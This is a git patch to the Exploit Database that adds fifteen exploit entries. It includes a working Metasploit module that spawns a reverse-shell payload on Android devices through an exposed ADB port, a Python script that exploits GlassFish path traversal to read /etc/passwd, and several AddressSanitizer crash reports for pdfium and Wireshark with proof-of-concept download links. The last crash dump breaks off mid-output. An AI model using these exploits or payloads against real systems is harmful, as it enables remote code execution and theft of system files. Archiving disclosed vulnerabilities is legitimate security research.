From 67dd87a6f52b074fbc83d31b4fdb3388429ad8d6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 27 Jan 2016 05:03:06 +0000 Subject: [PATCH] DB: 2016-01-27 15 new exploits --- files.csv | 15 ++++ platforms/android/remote/39328.rb | 85 +++++++++++++++++++ platforms/java/webapps/39241.py | 13 +++ platforms/multiple/dos/39321.txt | 103 +++++++++++++++++++++++ platforms/multiple/dos/39322.txt | 109 ++++++++++++++++++++++++ platforms/multiple/dos/39323.txt | 65 +++++++++++++++ platforms/multiple/dos/39324.txt | 113 +++++++++++++++++++++++++ platforms/multiple/dos/39325.txt | 89 ++++++++++++++++++++ platforms/multiple/dos/39326.txt | 64 ++++++++++++++ platforms/multiple/dos/39327.txt | 133 ++++++++++++++++++++++++++++++ platforms/php/webapps/39319.txt | 77 +++++++++++++++++ platforms/php/webapps/39320.txt | 48 +++++++++++ platforms/windows/dos/39274.py | 32 +++++++ platforms/windows/dos/39329.py | 29 +++++++ platforms/windows/dos/39330.txt | 66 +++++++++++++++ platforms/windows/dos/39331.pl | 35 ++++++++ 16 files changed, 1076 insertions(+) create mode 100755 platforms/android/remote/39328.rb create mode 100755 platforms/java/webapps/39241.py create mode 100755 platforms/multiple/dos/39321.txt create mode 100755 platforms/multiple/dos/39322.txt create mode 100755 platforms/multiple/dos/39323.txt create mode 100755 platforms/multiple/dos/39324.txt create mode 100755 platforms/multiple/dos/39325.txt create mode 100755 platforms/multiple/dos/39326.txt create mode 100755 platforms/multiple/dos/39327.txt create mode 100755 platforms/php/webapps/39319.txt create mode 100755 platforms/php/webapps/39320.txt create mode 100755 platforms/windows/dos/39274.py create mode 100755 platforms/windows/dos/39329.py create mode 100755 platforms/windows/dos/39330.txt create mode 100755 platforms/windows/dos/39331.pl diff --git a/files.csv b/files.csv index 922acbdf6..fdf8ddb6b 100755 --- a/files.csv +++ b/files.csv @@ -35489,6 +35489,7 @@ id,file,description,date,author,platform,type,port 39238,platforms/php/webapps/39238.txt,"AtomCMS SQL Injection and Arbitrary File Upload Vulnerabilities",2014-07-07,"Jagriti Sahu",php,webapps,0 39239,platforms/php/webapps/39239.txt,"xClassified 'ads.php' SQL Injection Vulnerability",2014-07-07,Lazmania61,php,webapps,0 39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0 +39241,platforms/java/webapps/39241.py,"Glassfish Server - Arbitrary File Read Vulnerability",2016-01-15,bingbing,java,webapps,4848 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash PoC",2016-01-15,"Abraham Espinosa",windows,dos,0 39243,platforms/php/webapps/39243.txt,"phpDolphin <= 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80 39244,platforms/linux/local/39244.txt,"Amanda <= 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0 @@ -35517,6 +35518,7 @@ id,file,description,date,author,platform,type,port 39271,platforms/php/webapps/39271.txt,"CMSimple Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0 39272,platforms/php/webapps/39272.txt,"CMSimple Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 +39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 39277,platforms/linux/local/39277.c,"Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0 @@ -35558,3 +35560,16 @@ id,file,description,date,author,platform,type,port 39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers Session Hijacking Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0 39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0 39318,platforms/multiple/remote/39318.txt,"Laravel 'Hash::make()' Function Password Truncation Security Weakness",2014-09-16,"Pichaya Morimoto",multiple,remote,0 +39319,platforms/php/webapps/39319.txt,"Wordpress Booking Calendar Contact Form Plugin <=1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80 +39320,platforms/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,php,webapps,80 +39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39323,platforms/multiple/dos/39323.txt,"Wireshark - iseries_check_file_type Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39324,platforms/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack-Based Buffer Overflow",2016-01-26,"Google Security Research",multiple,dos,0 +39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39327,platforms/multiple/dos/39327.txt,"Wireshark dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39328,platforms/android/remote/39328.rb,"Android ADB Debug Server Remote Payload Execution",2016-01-26,metasploit,android,remote,5555 +39329,platforms/windows/dos/39329.py,"InfraRecorder '.m3u' File Buffer Overflow Vulnerability",2014-05-25,"Osanda Malith",windows,dos,0 +39330,platforms/windows/dos/39330.txt,"Foxit Reader <= 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 +39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 Denial Of Service Vulnerability",2014-05-14,j0s3h4x0r,windows,dos,0 diff --git a/platforms/android/remote/39328.rb b/platforms/android/remote/39328.rb new file mode 100755 index 000000000..c1f71095d --- /dev/null +++ b/platforms/android/remote/39328.rb @@ -0,0 +1,85 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex/proto/adb' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Android ADB Debug Server Remote Payload Execution', + 'Description' => %q{ + Writes and spawns a native payload on an android device that is listening + for adb debug messages. + }, + 'Author' => ['joev'], + 'License' => MSF_LICENSE, + 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' }, + 'Platform' => 'linux', + 'Arch' => [ARCH_ARMLE, ARCH_X86, ARCH_X86_64, ARCH_MIPSLE], + 'Targets' => [ + ['armle', {'Arch' => ARCH_ARMLE}], + ['x86', {'Arch' => ARCH_X86}], + ['x64', {'Arch' => ARCH_X86_64}], + ['mipsle', {'Arch' => ARCH_MIPSLE}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 01 2016' + )) + + register_options([ + Opt::RPORT(5555), + OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']) + ], self.class) + end + + def check + setup_adb_connection do + device_info = @adb_client.connect.data + print_good "Detected device:\n#{device_info}" + return Exploit::CheckCode::Vulnerable + end + + Exploit::CheckCode::Unknown + end + + def execute_command(cmd, opts) + response = @adb_client.exec_cmd(cmd) + print_good "Command executed, response:\n #{response}" + end + + def exploit + setup_adb_connection do + device_data = @adb_client.connect + print_good "Connected to device:\n#{device_data.data}" + execute_cmdstager({ + flavor: :echo, + enc_format: :octal, + prefix: '\\\\0', + temp: datastore['WritableDir'], + linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8, + background: true, + nodelete: true + }) + end + end + + def setup_adb_connection(&blk) + begin + print_status "Connecting to device..." + connect + @adb_client = Rex::Proto::ADB::Client.new(sock) + blk.call + ensure + disconnect + end + end + +end \ No newline at end of file diff --git a/platforms/java/webapps/39241.py b/platforms/java/webapps/39241.py new file mode 100755 index 000000000..5745a4a42 --- /dev/null +++ b/platforms/java/webapps/39241.py @@ -0,0 +1,13 @@ +# Title: glassfish Arbitrary file read vulnerability +# Date : 01/15/2016 +# Author: bingbing +# Software link: https://glassfish.java.net/download.html +# Software: GlassFish Server +# Tested: Windows 7 SP1 64bits + + +#!/usr/bin/python +import urllib2 +response=urllib2.urlopen('http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd') +s=response.read() +print s \ No newline at end of file diff --git a/platforms/multiple/dos/39321.txt b/platforms/multiple/dos/39321.txt new file mode 100755 index 000000000..73b5c06e7 --- /dev/null +++ b/platforms/multiple/dos/39321.txt @@ -0,0 +1,103 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=626 + +The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing: + +--- cut --- +==9326==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250001bf680 at pc 0x000000892375 bp 0x7ffca7393ea0 sp 0x7ffca7393e98 +READ of size 4 at 0x6250001bf680 thread T0 + #0 0x892374 in opj_jp2_apply_pclr third_party/pdfium/third_party/libopenjpeg20/jp2.c:1018:18 + #1 0x88d536 in opj_jp2_decode third_party/pdfium/third_party/libopenjpeg20/jp2.c:1512:5 + #2 0x8580f6 in opj_decode third_party/pdfium/third_party/libopenjpeg20/openjpeg.c:412:10 + #3 0x5d8c02 in CJPX_Decoder::Init(unsigned char const*, unsigned int) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11 + #4 0x5dc7d0 in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10 + #5 0xb9909c in decoder third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:75:36 + #6 0xb9909c in CPDF_DIBSource::LoadJpxBitmap() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:698 + #7 0xb917d3 in CPDF_DIBSource::CreateDecoder() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5 + #8 0xb8c8af in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13 + #9 0xb75b33 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7 + #10 0xb75693 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13 + #11 0xba9823 in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11 + #12 0xbaa67e in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17 + #13 0xb7d368 in CPDF_ImageRenderer::StartLoadDIBSource() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7 + #14 0xb77897 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7 + #15 0xb64fb6 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10 + #16 0xb70a25 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13 + #17 0xb6f633 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3 + #18 0x52c1f1 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) third_party/pdfium/fpdfsdk/src/fpdfview.cpp:752:3 + #19 0x52b7fb in FPDF_RenderPageBitmap third_party/pdfium/fpdfsdk/src/fpdfview.cpp:507:3 + #20 0x4dae22 in RenderPage(std::__1::basic_string, std::__1::allocator > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:363:3 + #21 0x4dd558 in RenderPdf(std::__1::basic_string, std::__1::allocator > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9 + #22 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5 +0x6250001bf680 is located 0 bytes to the right of 9600-byte region [0x6250001bd100,0x6250001bf680) +allocated by thread T0 here: + #0 0x4b0154 in __interceptor_calloc + #1 0x88219f in opj_j2k_update_image_data third_party/pdfium/third_party/libopenjpeg20/j2k.c:8157:57 + #2 0x8817d7 in opj_j2k_decode_tiles third_party/pdfium/third_party/libopenjpeg20/j2k.c:9603:23 + #3 0x869d57 in opj_j2k_exec third_party/pdfium/third_party/libopenjpeg20/j2k.c:7286:41 + #4 0x869d57 in opj_j2k_decode third_party/pdfium/third_party/libopenjpeg20/j2k.c:9796 + #5 0x88d234 in opj_jp2_decode third_party/pdfium/third_party/libopenjpeg20/jp2.c:1483:8 + #6 0x8580f6 in opj_decode third_party/pdfium/third_party/libopenjpeg20/openjpeg.c:412:10 + #7 0x5d8c02 in CJPX_Decoder::Init(unsigned char const*, unsigned int) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11 + #8 0x5dc7d0 in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10 + #9 0xb9909c in decoder third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:75:36 + #10 0xb9909c in CPDF_DIBSource::LoadJpxBitmap() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:698 + #11 0xb917d3 in CPDF_DIBSource::CreateDecoder() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5 + #12 0xb8c8af in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13 + #13 0xb75b33 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7 + #14 0xb75693 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13 + #15 0xba9823 in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11 + #16 0xbaa67e in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17 + #17 0xb7d368 in CPDF_ImageRenderer::StartLoadDIBSource() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7 + #18 0xb77897 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7 + #19 0xb64fb6 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10 + #20 0xb70a25 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13 + #21 0xb6f633 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3 + #22 0x52c1f1 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) third_party/pdfium/fpdfsdk/src/fpdfview.cpp:752:3 + #23 0x52b7fb in FPDF_RenderPageBitmap third_party/pdfium/fpdfsdk/src/fpdfview.cpp:507:3 + #24 0x4dae22 in RenderPage(std::__1::basic_string, std::__1::allocator > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:363:3 + #25 0x4dd558 in RenderPdf(std::__1::basic_string, std::__1::allocator > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9 + #26 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5 + +SUMMARY: AddressSanitizer: heap-buffer-overflow (pdfium_test+0x892374) +Shadow bytes around the buggy address: + 0x0c4a8002fe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a8002fe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a8002fea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a8002feb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a8002fec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c4a8002fed0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a8002fee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a8002fef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a8002ff00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a8002ff10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a8002ff20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==9326==ABORTING +--- cut --- + +The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554172. Attached is a PDF file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39321.zip + diff --git a/platforms/multiple/dos/39322.txt b/platforms/multiple/dos/39322.txt new file mode 100755 index 000000000..08702e1ed --- /dev/null +++ b/platforms/multiple/dos/39322.txt @@ -0,0 +1,109 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=624 + +The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing: + +--- cut --- +$ ./pdfium_test asan_heap-oob_91e21c_3386_e3df547c206840ceb03fd7c7ca823e7a +Rendering PDF file asan_heap-oob_91e21c_3386_e3df547c206840ceb03fd7c7ca823e7a. +Non-linearized path... +================================================================= +==28048==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000b400 at pc 0x000000a91f64 bp 0x7fffdebdb0f0 sp 0x7fffdebdb0e8 +READ of size 4 at 0x61200000b400 thread T0 + #0 0xa91f63 in opj_j2k_read_mcc third_party/libopenjpeg20/j2k.c:5378:35 + #1 0xa77265 in opj_j2k_read_header_procedure third_party/libopenjpeg20/j2k.c:7213:23 + #2 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41 + #3 0xa51467 in opj_j2k_read_header third_party/libopenjpeg20/j2k.c:6764:15 + #4 0xac643f in opj_jp2_read_header third_party/libopenjpeg20/jp2.c:2648:9 + #5 0xa39a8d in opj_read_header third_party/libopenjpeg20/openjpeg.c:391:10 + #6 0x7863ca in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:729:8 + #7 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10 + #8 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24 + #9 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5 + #10 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13 + #11 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7 + #12 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13 + #13 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11 + #14 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17 + #15 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7 + #16 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7 + #17 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10 + #18 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13 + #19 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3 + #20 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3 + #21 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3 + #22 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3 + #23 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9 + #24 0x4f16e9 in main samples/pdfium_test.cc:608:5 + +0x61200000b400 is located 0 bytes to the right of 320-byte region [0x61200000b2c0,0x61200000b400) +allocated by thread T0 here: + #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56 + #1 0xa8b0b3 in opj_j2k_read_siz third_party/libopenjpeg20/j2k.c:2262:25 + #2 0xa77265 in opj_j2k_read_header_procedure third_party/libopenjpeg20/j2k.c:7213:23 + #3 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41 + #4 0xa51467 in opj_j2k_read_header third_party/libopenjpeg20/j2k.c:6764:15 + #5 0xac643f in opj_jp2_read_header third_party/libopenjpeg20/jp2.c:2648:9 + #6 0xa39a8d in opj_read_header third_party/libopenjpeg20/openjpeg.c:391:10 + #7 0x7863ca in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:729:8 + #8 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10 + #9 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24 + #10 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5 + #11 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13 + #12 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7 + #13 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13 + #14 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11 + #15 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17 + #16 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7 + #17 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7 + #18 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10 + #19 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13 + #20 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3 + #21 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3 + #22 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3 + #23 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3 + #24 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9 + #25 0x4f16e9 in main samples/pdfium_test.cc:608:5 + +SUMMARY: AddressSanitizer: heap-buffer-overflow third_party/libopenjpeg20/j2k.c:5378:35 in opj_j2k_read_mcc +Shadow bytes around the buggy address: + 0x0c247fff9630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff9640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff9650: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c247fff9660: 00 00 00 00 00 00 00 